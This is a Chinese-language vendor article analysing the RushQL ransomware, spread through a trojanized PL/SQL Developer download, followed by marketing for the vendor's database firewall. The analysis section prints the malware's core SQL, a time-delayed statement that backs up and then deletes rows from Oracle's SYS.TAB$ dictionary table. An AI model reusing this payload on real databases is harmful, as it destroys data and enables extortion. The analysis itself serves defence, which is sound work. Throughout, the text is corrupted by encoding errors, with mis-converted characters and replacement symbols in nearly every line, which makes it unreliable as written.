一��、Oracle數(shù)據(jù)庫(kù)勒索病毒死灰復(fù)燃
2018-11-19 國(guó)家信息安全漏洞共享平臺(tái)正式發(fā)布通告“Oracle數(shù)據(jù)庫(kù)勒索病毒RushQL死灰復(fù)燃”�����。轉(zhuǎn)載原文如下:
從這封簡(jiǎn)短的通告我們可以發(fā)現(xiàn)�,RushQL勒索病毒已經(jīng)不是第一次肆虐Oracle數(shù)據(jù)庫(kù)����,早在2016年11月就已經(jīng)在全球掀起了一場(chǎng)血雨腥風(fēng)。當(dāng)然����,那時(shí)候它有個(gè)更響亮的名字“比特幣勒索病毒”。
目光回溯到2016年11月�����,全國(guó)多家企事業(yè)單位遭受比特幣勒索通知“你的數(shù)據(jù)庫(kù)已被鎖死,發(fā)送5個(gè)比特幣到這個(gè)地址�!”。用戶在登陸Oracle數(shù)據(jù)庫(kù)時(shí)出現(xiàn)如下勒索警告信息�,被要求上交5個(gè)比特幣來(lái)?yè)Q取解鎖數(shù)據(jù)庫(kù)的服務(wù)。
時(shí)隔整整兩年����,RushQL勒索病毒卷土重來(lái),發(fā)動(dòng)新一輪的肆虐�����。我們不禁要反問(wèn)自己:為什么我們會(huì)遭到同一勒索病毒連續(xù)攻擊�?數(shù)據(jù)庫(kù)安全廠商能幫助數(shù)據(jù)庫(kù)用戶做些什么?
作為一家專注數(shù)據(jù)庫(kù)安全的廠商�����,安華金和早已對(duì)RushQL勒索病毒進(jìn)行了深度的解析并提供了解決方案����。
二、勒索病毒攻擊原理分析
早在2016年RushQL勒索病毒出現(xiàn)的時(shí)候,安華金和的攻防實(shí)驗(yàn)室就對(duì)該病毒做了深度分析����,并提供了有效的檢測(cè)和防護(hù)措施。
RushQL勒索病毒攻擊的目標(biāo)人群是數(shù)據(jù)庫(kù)管理人員(DBA)�。通過(guò)在CSDN等網(wǎng)站上惡意散播攜帶勒索病毒的PL SQL Developer(PL/SQL)軟件程序,引誘用戶下載并發(fā)起勒索攻擊�����。
攜帶RushQL病毒的PL/SQL����,解壓后主目錄的AfterConnect.SQL文件存在異常。官方的PL/SQL下AfterConnect.SQL是空文件��,而異常的AfterConnect.SQL有 35KB����。
該腳本的關(guān)鍵代碼�����,采用了 Oracle數(shù)據(jù)庫(kù)專用代碼加密工具wrap進(jìn)行了加密���,我們對(duì)病毒腳本進(jìn)行解密后發(fā)現(xiàn)�,該腳本的主要功能是創(chuàng)建4個(gè)存儲(chǔ)過(guò)程和3個(gè)觸發(fā)器:
存儲(chǔ)過(guò)程 DBMS_SUPPORT_INTERNAL
存儲(chǔ)過(guò)程 DBMS_STANDARD_FUN9
存儲(chǔ)過(guò)程 DBMS_SYSTEM_INTERNA
存儲(chǔ)過(guò)程 DBMS_CORE_INTERNAL
觸發(fā)器 DBMS_SUPPORT_INTERNAL
觸發(fā)器 DBMS_ SYSTEM _INTERNAL
觸發(fā)器 DBMS_ CORE _INTERNAL
三個(gè)觸發(fā)器本身沒(méi)有問(wèn)題,問(wèn)題在于存儲(chǔ)過(guò)程���。以DBMS_SUPPORT_INTERNAL為例����,該存儲(chǔ)過(guò)程的核心是兩條SQL語(yǔ)句:
第1條SQL語(yǔ)句:SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE; IF (DATE1>=1200)
語(yǔ)句含義:根據(jù)創(chuàng)建數(shù)據(jù)庫(kù)時(shí)間和當(dāng)前時(shí)間差值做決定:是立刻入侵?jǐn)?shù)據(jù)庫(kù)實(shí)施勒索�,還是先保持潛伏直到條件成熟再爆發(fā)進(jìn)行勒索。判斷條件為數(shù)據(jù)庫(kù)實(shí)例創(chuàng)建時(shí)間距今是否滿足1200天�����,一旦滿足并重啟數(shù)據(jù)庫(kù)實(shí)例則執(zhí)行第2條SQL語(yǔ)句����。第2條SQL語(yǔ)句:EXECUTE IMMEDIATE'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system as select *from sys.tab$';DELETE SYS.TAB$ WHERE DATAOBJ# IN (SELECTDATAOBJ# FROM SYS.OBJ$ WHERE OWNER# NOT IN (0,38)) ;
語(yǔ)句含義:勒索者首先對(duì)tab$中的文件進(jìn)行備份,然后再刪除tab$表中的部分內(nèi)容清理數(shù)據(jù)庫(kù)的備份文件后��,向用戶彈窗實(shí)施勒索��。
綜上所述�����,RushQL勒索病毒就是通過(guò)執(zhí)行這些腳本入侵Oracle數(shù)據(jù)庫(kù)。一旦使用這個(gè)PL/SQL工具訪問(wèn)數(shù)據(jù)庫(kù)�����,相應(yīng)對(duì)象會(huì)被后臺(tái)自動(dòng)注入數(shù)據(jù)庫(kù)�,執(zhí)行觸發(fā)器阻止后續(xù)的用戶登錄,并通過(guò)任務(wù)Truncate數(shù)據(jù)庫(kù)表����。
三、專項(xiàng)治理勒索病毒
2014年在國(guó)內(nèi)“數(shù)據(jù)庫(kù)安全”方興未艾之際����,安華金和已經(jīng)開(kāi)始推廣數(shù)據(jù)庫(kù)防護(hù)墻產(chǎn)品:通過(guò)串接部署的方式矗立在數(shù)據(jù)庫(kù)最前端,形成了數(shù)據(jù)庫(kù)安全的最后一道防線�。
安華金和數(shù)據(jù)庫(kù)防火墻產(chǎn)品,提供“數(shù)據(jù)庫(kù)漏洞攻擊防護(hù)”能力�,是目前應(yīng)對(duì)數(shù)據(jù)庫(kù)勒索病毒最高效的產(chǎn)品選擇。其防護(hù)的范圍不僅涵蓋CVE和CNNVN已經(jīng)公布的大量數(shù)據(jù)庫(kù)漏洞�;還深度剖析“勒索病毒”的攻擊方式,提供防護(hù)手段�����。
安華金和數(shù)據(jù)庫(kù)防火墻產(chǎn)品�,可以對(duì)oracle數(shù)據(jù)庫(kù)的“密文存儲(chǔ)過(guò)程”進(jìn)行解密操作。這種準(zhǔn)確破解“密文存儲(chǔ)過(guò)程”的能力����,不但在本次勒索案例中十分關(guān)鍵,也是防止第三方工具向數(shù)據(jù)庫(kù)發(fā)送惡意存儲(chǔ)過(guò)程的關(guān)鍵�����,只有準(zhǔn)確破解加密包的內(nèi)容才能進(jìn)行精確的語(yǔ)法分析��。
數(shù)據(jù)庫(kù)防火墻能夠把這些訪問(wèn)數(shù)據(jù)庫(kù)的密文存儲(chǔ)過(guò)程“明文化”�����,對(duì)“明文”進(jìn)行SQL語(yǔ)法分析�,匹配特征值;并對(duì)前后關(guān)聯(lián)的SQL行為進(jìn)行分析�。如果判斷該“語(yǔ)句包”存在惡意行為。產(chǎn)品可以進(jìn)行會(huì)話阻斷��,并向相關(guān)人員進(jìn)行危險(xiǎn)告警��,完成對(duì)數(shù)據(jù)庫(kù)攻擊的主動(dòng)防護(hù)���。
數(shù)據(jù)庫(kù)防火墻產(chǎn)品早以形成內(nèi)置的“虛擬補(bǔ)丁”規(guī)則���,專項(xiàng)治理“RushQL勒索病毒(比特幣攻擊)”���,如下圖:
漏洞類型:惡意代碼
漏洞源:攻擊者可利用漏洞進(jìn)行比特幣攻擊
數(shù)據(jù)庫(kù)版本:Oracle
勒索病毒入侵?jǐn)?shù)據(jù)庫(kù)多數(shù)是利用了數(shù)據(jù)庫(kù)已有的安全漏洞,或者是植入惡意的存儲(chǔ)過(guò)程��。數(shù)據(jù)庫(kù)長(zhǎng)期暴露在應(yīng)用系統(tǒng)和數(shù)據(jù)庫(kù)運(yùn)維人員的訪問(wèn)之下���,如何有效防護(hù)勒索病毒��?數(shù)據(jù)庫(kù)防火墻提出三條解決方案:
①學(xué)習(xí)期行為建模
產(chǎn)品可自定義學(xué)習(xí)期�����,并基于學(xué)習(xí)期完成語(yǔ)句�����、會(huì)話的建模分析���,構(gòu)建數(shù)據(jù)庫(kù)安全防護(hù)模型;并具備數(shù)據(jù)庫(kù)語(yǔ)法分析能力�����,可以對(duì)SQL語(yǔ)句進(jìn)行抽象描述,將海量的SQL語(yǔ)句歸類成SQL模板��,從而定義語(yǔ)句黑白名單規(guī)則�����。
學(xué)習(xí)期結(jié)束后�����,對(duì)非法的訪問(wèn)行為和SQL語(yǔ)句主動(dòng)攔截���、阻斷,阻止惡意攻擊行為�。
(注:攔截和阻斷的區(qū)別:系統(tǒng)支持會(huì)話阻斷,可準(zhǔn)確定位風(fēng)險(xiǎn)來(lái)源并阻斷會(huì)話請(qǐng)求�。在會(huì)話阻斷的基礎(chǔ)上,系統(tǒng)提供“語(yǔ)句攔截”的處理機(jī)制�,僅針對(duì)會(huì)話里產(chǎn)生風(fēng)險(xiǎn)的SQL語(yǔ)句進(jìn)行攔截,保持會(huì)話內(nèi)其他合規(guī)語(yǔ)句的正常操作���。)
②漏洞攻擊防護(hù)
系統(tǒng)提供“虛擬補(bǔ)丁”防護(hù)能力�,內(nèi)置大量數(shù)據(jù)庫(kù)漏洞防護(hù)規(guī)則����,防護(hù)范圍包括:系統(tǒng)注入����、緩存區(qū)溢出��、權(quán)限提升����、數(shù)據(jù)泄露、拒絕服務(wù)等20多種數(shù)據(jù)庫(kù)漏洞類型����。當(dāng)外部系統(tǒng)利用數(shù)據(jù)庫(kù)漏洞進(jìn)行入侵時(shí),及時(shí)阻斷入侵的風(fēng)險(xiǎn)會(huì)話�����。
③敏感數(shù)據(jù)防護(hù)
系統(tǒng)可關(guān)聯(lián)數(shù)據(jù)庫(kù)的Schema�、表、字段等對(duì)象信息�����,建立敏感數(shù)據(jù)規(guī)則�����。對(duì)象之間又可以自定義“與/或”關(guān)系,形成敏感數(shù)據(jù)組�。數(shù)據(jù)庫(kù)防火墻針對(duì)“敏感數(shù)據(jù)組”建立安全防護(hù)體系,可結(jié)合“應(yīng)用信息”��、“客戶端信息”���、“操作行為”等元素共同定義操作規(guī)則。通過(guò)敏感數(shù)據(jù)組可以對(duì)數(shù)據(jù)庫(kù)的“核心系統(tǒng)表”進(jìn)行有效防護(hù)���,在允許常規(guī)訪問(wèn)的前提下�,防止惡意篡改和引用�。
產(chǎn)品咨詢:4000 258 365 
